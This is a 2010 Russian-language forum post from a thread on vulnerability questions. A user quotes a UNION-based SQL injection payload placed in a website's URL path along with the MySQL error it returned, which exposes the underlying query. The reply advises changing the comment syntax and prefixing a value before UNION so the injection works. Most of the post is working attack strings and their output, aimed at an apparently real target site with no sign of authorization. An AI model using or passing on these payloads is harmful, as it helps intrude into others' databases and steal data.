Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #3  
Старый 04.08.2010, 10:16
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами: 10889431

Репутация: 34
По умолчанию
Цитата:
Сообщение от roddik  
Спасибо за идею, я правильно понял?
Код:
http://domain/'/**/union/**/select/**/1,2,3#comment
выводит
Код:
Database error: Invalid SQL: select * from elementpath where path='/'/**/union/**/select/**/1,2,3'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
Session halted.
#comment - это ты так коментишь прям в браузере?

Если да, то попробуй так /*

Ещё стоит мне кажется что нибудь перед UNION написать типа

domain/test'/**/union ....
 
Ответить с цитированием